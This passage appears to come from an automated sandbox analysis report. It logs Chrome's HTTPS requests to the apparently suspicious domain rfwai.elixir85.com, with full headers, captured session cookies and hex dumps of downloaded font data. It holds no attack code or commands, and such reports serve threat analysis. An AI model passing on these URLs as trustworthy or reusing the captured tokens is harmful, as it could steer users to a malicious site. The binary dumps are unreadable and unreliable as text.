                                                        2024-07-03 19:07:21 UTC1369INData Raw: 2d cf 99 80 54 9b eb 9f 00 6a 07 4d d1 ff 28 8b fc 6c d2 51 9d 0e 83 9d 22 5c e7 48 fc 92 05 99 2d cc c3 68 90 eb c1 5c 1c b1 24 18 71 2e 08 a3 6c db c7 5b cb 58 47 63 ba 7c 3d 91 9d bf 11 44 11 fd a1 6b 70 7b ee c6 de 50 49 44 db ef aa dc 2c 43 d6 77 cc 1f aa ac 43 7b cb 87 68 e6 c2 24 ef 71 39 38 ea ca 50 a1 dd a1 b9 16 af e7 5b 36 1a a3 68 7d b7 d1 9b 19 9e 1c 5e da b3 75 d6 19 24 b3 60 d0 95 e7 b7 0d b0 2c 6e a1 9e a0 81 cf 5d 0e 63 53 f1 46 00 2f bb fe 1f 70 a5 9e 58 1d 8b e9 75 3b 36 ba 42 6c 18 29 19 db c5 7e 29 4e 35 47 ef 03 d3 11 c4 6b cc 5c b2 8c 98 87 f1 b4 13 7a 4a eb 68 53 1d d1 cd 11 38 50 f8 a2 27 ad a6 67 78 4b 59 17 a6 07 71 e0 18 1c 10 0b 1d 4d 5f a1 68 c3 41 66 ce 84 77 dd 8c a7 e9 0d 2d 3e d3 90 90 f7 e2 a7 6d b2 50 7a fd 83 9e 09 59
                                                        Data Ascii: -TjM(lQ"\H-h\$q.l[XGc|=Dkp{PID,CwC{h$q98P[6h}^u$`,n]cSF/pXu;6Bl)~)N5Gk\zJhS8P'gxKYqM_hAfw->mPzY
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 39 e2 c8 e7 ed 03 c0 64 f5 67 15 d4 4b a0 1c 83 ae 60 ec ae 01 51 24 52 a8 17 ec d7 e5 02 86 d6 f7 93 a3 02 4c fd 08 2e 8c 51 67 00 58 f0 b7 dd 29 00 ab bc b1 63 95 3a c0 e5 1b 8e 84 eb 18 37 bb ef 5b d7 78 fc 7d eb 19 6f bf 0f 7d 63 b3 00 00 20 24 28 4c 1c 20 c3 ee 31 20 a1 ae 01 e7 67 65 60 3c ab 00 96 58 09 ac 4a bb 44 03 43 dd 38 d9 f3 a2 2b cd a5 b3 5c 2d 6b ac c0 93 b0 6f fd 3a 04 fd 22 2e c2 be 55 37 a0 58 93 20 c4 cf 40 e9 fe 01 ff a3 bf 02 54 df f1 8b 37 d2 18 b9 b2 03 8d 66 21 96 60 25 57 88 a6 3f f3 e8 ee 9c 1a f8 ec 5f 95 a3 57 af 34 dc c0 f6 14 72 54 dc 81 7e 73 3e 7a 37 c6 fa dd 84 b2 82 b7 a0 7a 70 7b fd bf 42 d0 4f eb 28 a4 30 55 01 23 24 61 8a 97 2a 35 0e da f7 f4 cd 10 22 2c 42 aa 28 31 81 9a 39 89 24 32 0a 29 54 d2 64 c9 91 a7 40 89 a2
                                                        Data Ascii: 9dgK`Q$RL.QgX)c:7[x}o}c $(L 1 ge`<XJDC8+\-ko:".U7X @T7f!`%W?_W4rT~s>z7zp{BO(0U#$a*5",B(19$2)Td@
                                                        2024-07-03 19:07:21 UTC1369INData Raw: af 7c b3 6d 8b 0c 04 3f 40 60 4f 3c e0 20 be 10 e4 01 3d a8 7d a6 28 9b 38 a1 c5 64 57 74 3d ec 7f 7d 08 26 bd 16 95 ea 5b 16 b0 5d d2 de b5 6e b9 e3 ae 7b 6e 6b 72 28 f0 1d 1b 15 eb 74 db 4d 9d ae bb 2f 4e a5 f6 c0 61 4c 1d c7 6e b4 0c 4d bd 43 5d 9c ee 65 37 b8 ea ff 8d 8b ca 96 bb eb 56 d5 5a 4d 90 d4 e4 b5 76 87 e4 8d 45 7d 9a 48 7b 15 e0 5a c2 73 b4 ee 2e be 04 f8 b4 7e c7 da 3d f4 f5 ed 7a 5a 3f ac 25 b2 36 32 5a f6 5f c0 4a 1d ff a4 c9 f4 bf f6 4f f8 3a c0 5c 92 fa 51 9c be bf bc 3e 88 6f 28 0a 9c e4 45 91 5e ff 83 f9 e0 35 e2 f6 53 a6 99 64 a7 9e 68 3c 39 c1 74 f8 af 2d f4 6b e8 e9 d0 0e 42 8c e0 02 a8 36 9f 40 50 6b 72 08 44 df 89 c3 a0 23 f1 be 82 8f 9f a6 6c c8 ea e2 70 81 d8 e7 08 a7 65 e7 73 8e 16 c3 78 1e d8 5f dd 27 48 e7 20 ba 7f 9a bb 53
                                                        Data Ascii: |m?@`O< =}(8dWt=}&[]n{nkr(tM/NaLnMC]e7VZMvE}H{Zs.~=zZ?%62Z_JO:\Q>o(E^5Sdh<9t-kB6@PkrD#lpesx_'H S
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 85 bf 53 bf e2 c7 1c f6 cf 7b e2 5f aa f0 6f 0a fc 99 a3 fe 7b 4f fc 4f 15 fe 4f f1 7a c1 4f 5d c3 5e e8 fa 49 b7 d0 0e 70 d3 ad 1f fb c9 d3 33 05 10 1c 9c 8f f4 d8 f9 ab 65 5f 2e 9e fa 31 5c 0f 80 47 2e 03 e8 af 1b ab 78 90 19 8c 5c 3d 16 50 9e 10 aa b7 bb f1 96 e9 e8 50 5a 57 99 89 cb 42 8c 4f a5 c6 83 b0 72 71 d2 e9 5c 2c 8d e9 08 ac 4c 5d e9 e1 2a 2c 52 ba 08 9f 4a 8e 07 a1 28 86 32 a7 dd c8 b8 a8 8b 07 a7 74 ba 73 43 a8 e0 ea ca f2 67 58 b7 fe e2 8b 5d 0d dd c5 61 5a 55 59 9a 0f cd a5 7c b3 55 ed 6b 08 d9 3e 2e e8 14 eb a1 c6 2d 23 31 06 d3 5c 07 73 91 a5 48 f6 10 c2 65 09 59 44 d5 32 9e c2 c0 67 88 49 29 63 f6 60 86 66 ae f7 aa d0 58 94 7c 06 f4 ab 58 8e d0 72 36 8b 19 fb d1 96 1d 44 50 d7 90 6d 47 b6 20 cc 83 76 4d b5 21 b9 79 ec 7d 89 41 6e 78 78
                                                        Data Ascii: S{_o{OOOzO]^Ip3e_.1\G.x\=PPZWBOrq\,L]*,RJ(2tsCgX]aZUY|Uk>.-#1\sHeYD2gI)c`fX|Xr6DPmG vM!y}Anxx
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 12 04 2e 4d eb 35 d1 e1 80 1c 69 5d bf cc a1 e8 ac ef 3b f9 0a 24 ed 13 15 ac 4d 28 6d ea 7c 96 81 ad 6b 76 cb f2 ea 9a 98 e8 b3 84 7a ce d7 ad d3 1a f7 5d b8 96 7f e0 ef fb 3e d2 ff 10 71 be 45 2d 8d b5 93 2a 9f 2a fe 87 98 cc f7 1a 0f e6 a6 af f9 2b 26 34 d7 d6 39 10 09 be 2e 9e f0 d4 8e 33 b4 8b 19 e5 a9 9d 73 66 58 9e dc dc f7 04 ae e0 53 fd d4 74 7f cd 9a 76 7c 53 74 7a b8 41 07 9a 43 e8 66 29 ea 9d 9e 9c 9f 60 5e dc a2 67 a2 89 2e 8a 3d 6a 11 03 df b2 c3 35 2d db bf 54 8e 2c e8 63 02 b6 b6 82 1f 1e 48 3c 04 3a 4d 54 d0 ba 1b 7f cf 00 55 2a 7c 3c 7a f7 c0 a9 d4 3c 3a e4 66 3e 91 cb 46 cd d4 3b 3d 5e 7c 75 77 09 fc 80 de 6b 83 b1 31 20 03 f7 52 5b 17 79 79 fc fa e3 c7 fe 67 66 0b 87 1e ce e4 67 4f 5f 86 a5 da ce f5 c1 0b 83 57 1e 81 d4 75 41 77 3a b7
                                                        Data Ascii: .M5i];$M(m|kvz]>qE-**+&49.3sfXStv|StzACf)`^g.=j5-T,cH<:MTU*|<z<:f>F;=^|uwk1 R[yygfgO_WuAw:
                                                        2024-07-03 19:07:21 UTC1369INData Raw: f9 3b 07 e6 8f 03 0a 13 5b 7c 11 96 dd 39 50 c7 5c e8 b6 f3 ef e1 f8 f4 af 76 d7 04 6c a5 5b 5e a5 1f 82 e5 c8 48 75 02 05 a3 99 05 4b 0b cf 39 99 9b 44 e9 29 d2 4f e0 4d 76 5e eb d9 c9 2a 51 3c d3 98 aa 7e 11 1f 98 ae d2 2b d3 a4 f9 9a 0c b7 3d 84 70 b2 dd be ff 15 fd d3 ca ed c7 5a e4 3b 4f 4d 7e fe de f7 38 7c 59 78 f5 45 72 48 c9 b4 a5 47 d1 4f d6 15 62 27 b3 8b 70 d3 fa a2 3e a2 bc 65 ae 08 dd f4 4c 26 b8 0e bb 11 81 6e 8c ee b3 4e 29 73 93 b2 4d 47 db 14 36 f3 fd ef 69 4c 75 77 3d d1 4d 84 97 19 e8 a7 6b fe ff f9 e1 fa fd 4c a2 2c c7 1e 8d a7 96 3f 2a d7 8f 3f 1f 03 bf fd da ba fb e8 7b 75 c5 a3 0a fe 9a ef 16 b0 ec ef b4 ce b9 94 ed 47 9b 64 db 4f 4d ac 65 d4 fc 88 ba 28 3c ff 22 39 a2 6a b1 ac 41 de 47 d1 17 e3 ce e4 66 86 cf a8 ea 07 b9 46 7e 13
                                                        Data Ascii: ;[|9P\vl[^HuK9D)OMv^*Q<~+=pZ;OM~8|YxErHGOb'p>eL&nN)sMG6iLuw=MkL,?*?{uGdOMe(<"9jAGfF~


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        53192.168.2.549784104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:20 UTC1378OUTGET /12uyZYHBH78nzrKfwqr47 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Origin: https://rfwai.elixir85.com
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:21 UTC615INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:21 GMT
                                                        Content-Type: font/woff
                                                        Content-Length: 35970
                                                        Connection: close
                                                        Content-Disposition: inline; filename="12uyZYHBH78nzrKfwqr47"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=85HlvrrP7sB1KwNi1NzE84%2FkzbjyMmc3gm5CYFrzpT%2FSkfa8rMpFFHxOSZUR9ui3A8mesfgFP0z0YtCMn8kuTsXoYox7BLbt8hpFpOQNxTlgF%2ByUMQkBNimaxBKNqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d9286cab007c78-EWR
                                                        2024-07-03 19:07:21 UTC754INData Raw: 77 4f 46 46 00 01 00 00 00 00 8c 82 00 11 00 00 00 01 24 20 00 01 00 00 00 00 8b 5c 00 00 01 26 00 00 02 93 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8b 54 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 17 df 00 00 4e b6 ed 42 8f b9 47 53 55 42 00 00 19 60 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c 10 00 00 00 46 00 00 00 60 69 c3 7b 5b 63 6d 61 70 00 00 1c 58 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 84 dc 00 00 00 2f 00 00 00 3c 29 81 01 c0 66 70 67 6d 00 00 85 0c 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 84 d4 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 21 74 00 00 52 61 00 00 9d a4 24 e0 b2 69 68 65 61 64 00 00 73 d8 00 00 00 33 00 00 00 36 1b 16 7d b8 68 68 65 61 00 00 74 0c 00 00 00
                                                        Data Ascii: wOFF$ \&DSIGTGPOSNBGSUB`3yOS/2F`i{[cmapX<?+cvt /<)fpgm?gaspglyf!tRa$iheads36}hheat
                                                        2024-07-03 19:07:21 UTC1369INData Raw: f6 d2 01 fa 90 4a e8 10 1d a6 06 6a e2 04 f6 b2 8f bb 71 26 5f c6 d7 f2 60 be 81 87 f0 50 be 91 87 f1 4d 3c 9c 6f e6 5b f8 56 1e c1 b7 f1 48 1e cb 53 78 3a cf e0 99 3c 8b 67 f3 1c 9e cb f3 78 3e 2f e0 85 bc 88 17 f3 12 5e ca cb 78 39 af e0 95 bc 8a 57 73 2e e7 f1 26 de ca 85 bc 93 8b 78 0f 17 13 f3 6a 55 4a a9 94 ae 42 d4 53 9d a7 1c 32 28 5f b5 d0 01 55 c7 d3 d5 51 9e a1 82 3c 87 e2 79 ae 6a e6 79 d8 e7 ab f3 bc 50 85 78 b1 3a c5 cb d0 b6 02 6d 2b b1 af 56 d5 fc 8a aa e5 35 68 5b 8b 7e 45 b8 57 4c dd e8 72 70 c0 07 1e f8 30 ea 19 2a 50 75 18 f9 24 4f 41 af e9 94 86 d1 b7 f1 4c 4a e1 59 e4 e5 d9 e4 e1 39 18 65 ae da 02 4c b5 c0 14 02 a6 20 2f 22 3f b0 6d e1 a5 94 08 8c 8d bc 1c bf 2b f0 cc 4a ec ab c8 00 e6 a3 9c ab 1a f8 15 ea 2a d8 f3 54 21 6f c2 78 9b
                                                        Data Ascii: Jjq&_`PM<o[VHSx:<gx>/^x9Ws.&xjUJBS2(_UQ<yjyPx:m+V5h[~EWLrp0*Pu$OALJY9eL /"?m+J*T!ox
                                                        2024-07-03 19:07:21 UTC1369INData Raw: ff 11 7a a1 e7 db 00 aa 6a 1d 19 56 5a 57 86 48 dc 00 97 0c cb df 06 44 32 47 d0 be cf d6 47 e1 40 dc f0 9f e8 bc ef e6 e4 11 eb e1 13 bf 8f ec f1 0c fa c6 ab 90 aa 27 03 73 ec a2 5a 00 90 2e ee 04 71 d6 a8 af e9 82 6f 6a bb 7a 16 de dd 07 09 27 ab 4f 54 b9 aa 55 cd aa 5a fd 45 2d 01 d5 75 ea b0 3a a3 3e a3 38 d5 a4 ce 83 de 7c d0 df 97 52 70 75 94 92 c0 9f d8 51 f9 02 a8 d4 bf 0d 42 5d 85 3a 41 99 ea 04 a8 1d 40 1e 50 59 8d a6 7b cc dc 9e fc 2d 41 9c 5d 4e 7e e1 ae 81 59 7d 09 c9 c5 66 eb 02 ac d5 ea 24 f2 9c 78 a1 06 76 01 ed 20 75 4a f3 4a 73 10 96 d3 c5 99 53 50 7e d2 e5 2c 1e 67 be 18 f1 f2 a0 3a 07 1a 6b d4 11 70 26 01 60 40 f6 04 e9 96 a1 d1 83 3c d3 03 30 a4 9e 21 58 2e b9 e8 f5 4a d5 14 1b 2a b7 a9 57 21 b7 4c 00 a9 f7 14 b2 63 f0 af 00 c7 c9 e4
                                                        Data Ascii: zjVZWHD2GG@'sZ.qojz'OTUZE-u:>8|RpuQB]:A@PY{-A]N~Y}f$xv uJJsSP~,g:kp&`@<0!X.J*W!Lc
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 1a 9c 39 86 da a5 f6 aa 77 20 cb 62 68 0f 34 06 da 9b 6d cb 57 8e 1f aa b3 6a 87 ab 1a 2d 95 b7 c3 cd ea 20 ec e4 20 e4 58 62 d2 a1 73 2d f1 c6 01 8c ad b5 af 0c 39 56 10 ed a5 c0 9e 8a b3 24 f8 b3 0c f5 67 3c dd 1c d1 67 f8 61 5f 6f 80 8a a5 f0 7d 7e b1 da 06 f4 6d c1 dd 15 e4 87 9e 7f a2 df d2 6b 3f 0a 7c 59 82 eb 55 1a 8e e3 93 ba 16 47 b5 11 ef f0 ef 6d 8b 2b d5 ea 7e 3c b9 4e 7f c7 25 1e 2d e8 5a 17 09 60 fe 86 9a a4 72 25 2f e8 02 2b db 4d 37 e8 55 27 f5 38 65 ab 0f 1d 9a da 48 4c 4b 16 fe e6 a4 da 6f 71 df a0 ae 62 b9 65 ed bf c4 41 e5 d1 d0 46 b6 ae f5 10 75 5c 1d 06 cf fc a6 15 68 2a ac 9c da bd 26 1f f6 56 49 be c2 33 cf f4 db d8 52 bd 9e a6 69 8f 20 71 d3 03 9d 50 07 1c 1f 60 98 39 7c c4 bc 3e 14 3d d2 60 a6 15 ad 96 20 b3 6f a5 d2 1c f3 b4 ad
                                                        Data Ascii: 9w bh4mWj- Xbs-9V$g<ga_o}~mk?|YUGm+~<N%-Z`r%/+M7U'8eHLKoqbeAFu\h*&VI3Ri qP`9|>=` o
                                                        2024-07-03 19:07:21 UTC1369INData Raw: d7 58 35 64 95 ce b7 a1 21 51 be 30 47 2d b2 0e b5 9e 1d 15 6d 0b c8 96 da fa a0 ca c3 08 65 c8 4a c2 22 b7 ca 90 fe 55 ad b1 5d 3d d7 69 66 d6 59 bb ac 92 9b df 5d b4 59 47 5b a0 d6 a0 36 4b 32 2b 43 f5 17 b3 12 b6 f2 f1 06 e4 bd 46 ab 26 29 ed db 72 c8 f9 8e 27 7c d5 c0 f4 66 7f a5 04 5d b9 a5 ae 07 5d 54 ee 76 a8 3c aa ab 4e c9 d2 8a a4 2a d8 25 df fe 6b 5b 14 2a 5b 9a db fb 4b 97 75 75 4a 65 c4 dc dd 6b 7f c9 2f b5 48 99 53 57 d5 44 fb 7b 1c d4 1d 75 f0 0b a9 e2 ef b2 91 c5 37 80 af c9 ad ef 99 d5 fd 12 21 b2 25 f3 31 35 2c 45 de c5 d4 c9 93 a6 8e a5 09 bf 33 44 e7 bc f2 05 6a 36 20 00 d0 35 76 26 ee 24 8a a7 e9 2f f4 18 f0 41 b5 c0 14 14 2d 0d e8 15 76 e9 d5 5a d5 d6 45 58 cb 6c b1 fc 66 8b 95 ed 35 c3 fb b5 56 22 f1 ae 1c b8 d6 92 7b a4 fa 52 3f b9
                                                        Data Ascii: X5d!Q0G-meJ"U]=ifY]YG[6K2+CF&)r'|f]]Tv<N*%k[*[KuuJek/HSWD{u7!%15,E3Dj6 5v&$/A-vZEXlf5V"{R?
                                                        2024-07-03 19:07:21 UTC1369INData Raw: be 87 02 3c 86 c7 51 26 a2 09 ec 14 f1 e4 e7 d4 83 a7 f0 14 1a c8 53 79 2a f5 e6 a7 f8 29 4a e2 5f f0 2f 70 fe 34 3f 8d f3 5f f2 7f a2 cf 34 9e 46 5d f9 57 fc 2b 4a e3 67 f8 19 9c ff 9a 7f 8d f3 e9 3c 9d ae e1 19 3c 83 46 f1 4c 9e 49 f7 f0 2c 9e 45 63 78 36 cf a6 2b 79 0e cf a1 7e 88 59 cf 92 0f 51 eb 79 1c e7 f2 5c 1a cd f3 78 1e 0d e0 f9 3c 9f 46 f0 0b fc 5f d4 8d 17 f0 02 1a cc 0b 79 21 dd c0 8b 78 11 dd c6 8b 79 31 8d 44 a4 5b 42 b7 f0 52 5e 4a b7 f2 4b fc 12 8d 47 c4 5b 46 fd 79 39 2f a7 6b 79 05 af a0 eb 78 25 af a4 eb 11 07 57 d1 55 bc 9a 57 eb ff 3b c4 b9 74 35 ff 96 5f a6 cb 10 19 5f a1 3b 78 0d af a1 9b 74 84 a4 e1 3a 42 d2 5d 88 90 9b e8 76 44 c9 cd 74 b3 8e 93 94 a1 63 23 28 dc c1 3b 70 dc c9 3b 69 18 a2 64 11 0d 42 9c dc 43 37 22 56 16 d3 50
                                                        Data Ascii: <Q&Sy*)J_/p4?_4F]W+Jg<<FLI,Ecx6+y~YQy\x<F_y!xy1D[BR^JKG[Fy9/kyx%WUW;t5__;xt:B]vDtc#(;p;idBC7"VP
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 58 3a f1 f7 51 07 8a 8e 96 dd 16 0d 2b 1a 54 94 04 e7 22 8a ea f2 9f 23 98 50 be 0e 0e a6 06 63 83 93 03 e7 82 04 ce 04 7e 0d 14 06 32 02 63 02 ab 8f 3f 75 fc 49 ff 01 7f be 7f 07 f8 73 fc ab fc cb fc 63 fd f1 fe f8 a3 95 4a 9e aa 38 27 ec 40 58 be 75 35 c5 8a 4c 9b 39 e5 af cd 65 0b 47 f9 98 13 7c ad 34 70 06 da 4c 76 52 9c f9 65 db 65 ab 93 e6 2c 71 32 9d 2c 67 8d 93 e3 6c 74 f2 9c 5d ce 1e 27 df 29 70 0e db de 61 e7 b8 f3 31 e7 1d 4e de 3f ea 6c 27 e7 cf 22 c4 ba f4 ae 36 6a b1 f6 e8 4d ad 52 8a 66 6b 9e 36 e9 39 4d d2 34 8d 53 82 86 6a 87 b6 6a a7 66 6a be 5e d5 58 bd a6 17 35 45 dd f5 ba c6 eb 0d 4d d4 0c 2d 51 86 d2 94 ae 09 ca d4 7d 5a a0 85 4a d4 7e a5 aa 9f b2 b4 59 3d d8 a7 95 4a 52 9c 16 69 8c 66 11 4d 1b da 9a 6b ae 31 f7 b8 74 e1 56 6e a3 2b
                                                        Data Ascii: X:Q+T"#Pc~2c?uIscJ8'@Xu5L9eG|4pLvRee,q2,glt]')pa1N?l'"6jMRfk69M4Sjjfj^X5EM-Q}ZJ~Y=JRifMk1tVn+
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 11 da 60 1f 5c 11 1e e6 af 33 1a c2 62 c2 63 42 82 74 a1 fe a1 29 51 1a e8 94 ce 90 11 c1 e8 fd 55 ea 80 00 bd bf 37 63 34 e0 8c 2c 4b 66 9c d1 a8 95 de 18 b4 e7 f1 5f 17 9e 58 61 2b 29 ef 5e 51 bc fe dc 90 fd 36 83 e6 2f 1c 5a 74 1b c7 77 0f ae e9 11 3e e5 77 66 b6 ed ae 69 bf 2f 33 fd cc 8a 96 23 83 05 6c 79 fd bc 92 4e e1 a4 fd d1 ae ae a6 7e 61 39 a5 77 d3 e8 6d 7e 35 7f 04 19 50 ba 2d 25 32 c2 db 0b 46 11 97 21 86 c1 cd 80 5e 40 39 c1 b9 99 03 fa 04 a2 0a 8c c2 42 fc 7c 3d dc 90 01 1b 78 b5 7f 12 1f 1d 17 c7 58 32 fd b2 62 cc 19 5c a0 3a 2e ce 18 ed 0d 38 47 30 e6 8c 2c 6b a0 8a 63 b9 87 47 ce 75 b5 9f c5 e8 e8 9f 71 7a dd 97 c9 2f 3f da fe f8 e2 bc fc c1 63 6d f7 5f ce f9 a2 56 b8 ee df f1 32 f6 7e fe 04 f6 7d ad e7 c6 8f 17 6c dc 35 75 dd f9 65 eb
                                                        Data Ascii: `\3bcBt)QU7c4,Kf_Xa+)^Q6/Ztw>wfi/3#lyN~a9wm~5P-%2F!^@9B|=xX2b\:.8G0,kcGuqz/?cm_V2~}l5ue
                                                        2024-07-03 19:07:21 UTC1369INData Raw: ef f8 1e 3c 28 7c 24 bc f6 92 80 47 fa cf 6c 9c 21 68 97 ad 5d b7 f4 2f ec 5f 77 ff 34 c9 7e 80 a9 b7 bf c0 ef cc ed 7b 44 f8 b2 bd ae ae 4d 78 98 cc b3 e4 d1 db 5c 3a d0 38 89 e8 df b0 50 15 cf 61 16 24 07 cb 32 cd 40 e4 00 51 7c 28 fa 37 2a 22 38 d0 d3 1d 25 e1 24 5e 11 20 11 ac 99 62 10 13 67 c9 2c 04 e9 1a 20 0a 5b 15 a1 23 19 7d 66 da c0 4b 7b 9a 7c 47 dc 32 2b ba b2 57 ae 78 7f 14 bd 3f 75 e5 33 ed 4f 7e 91 fd 45 74 5f 75 75 ef fb c2 fb b3 b6 bc e4 9f 37 70 64 81 6d 5a 47 51 64 73 49 7f cf c0 b9 4b 73 0f f4 e4 1c 7f b8 70 76 55 fd f4 fe ee be 33 17 9a 1e 1e 28 00 7c fd 81 76 bb a9 1d 15 6a 0b 22 04 a2 3a d8 9b e8 04 51 be d2 09 88 41 be 13 6d 85 df 15 66 70 2b 84 19 02 f7 e4 67 9f dd 6d 83 fa 0f 41 7f df 85 fa c1 28 c6 66 00 ca 63 ca bc 0e 5d f4 d7
                                                        Data Ascii: <(|$Gl!h]/_w4~{DMx\:8Pa$2@Q|(7*"8%$^ bg, [#}fK{|G2+Wx?u3O~Et_uu7pdmZGQdsIKspvU3(|vj":QAmfp+gmA(fc]
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 70 9a c3 c8 aa a2 8d 93 28 3e 95 5a 45 fe 3b 50 6b d7 92 2d d1 31 ee 01 1e f7 fd 6c 1b 51 87 4b ea eb 87 6c 21 42 79 43 c0 d4 a8 cc 34 85 6a 30 de 96 9e 0c 5c fd 20 68 c8 d6 71 1a f2 85 27 6e 36 04 64 45 65 36 a5 c8 54 24 fc da 02 f3 0d a4 20 f2 45 91 28 cb 66 06 9e 52 63 06 ac 77 62 1a 49 f2 56 e3 10 c0 f0 d3 12 cb 30 24 48 1b e9 17 a9 05 db d3 8d 58 e0 8e 3e b8 d6 68 31 63 c5 0f 27 83 fe d3 f1 be f8 92 25 63 de 38 ee 13 1e 72 f4 c8 99 c5 97 ec 3f 12 bd 72 61 f7 25 61 c3 ff 0f f0 03 ed c7 df 47 7d c1 40 82 9f 1b f0 21 08 78 ce 1d bc 51 90 65 2a de 5d 25 79 a5 6a 4c f5 55 60 80 de 5f e7 27 69 2b ad af a7 3a 1c 3c 18 bd c1 62 d6 9b f5 46 d1 45 25 28 ea 40 6b 5e 22 ae ea e0 20 71 56 e1 2f d3 6f 7f 90 df f9 e9 a7 9f 1e bd 7b 87 f8 ac 9c ea a8 f0 c8 75 6a 4b
                                                        Data Ascii: p(>ZE;Pk-1lQKl!ByC4j0\ hq'n6dEe6T$ E(fRcwbIV0$HX>h1c'%c8r?ra%aG}@!xQe*]%yjLU`_'i+:<bFE%(@k^" qV/o{ujK


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        54192.168.2.549782104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:20 UTC1380OUTGET /90jodEH2Rir67QW4OuPst51 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Origin: https://rfwai.elixir85.com
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; 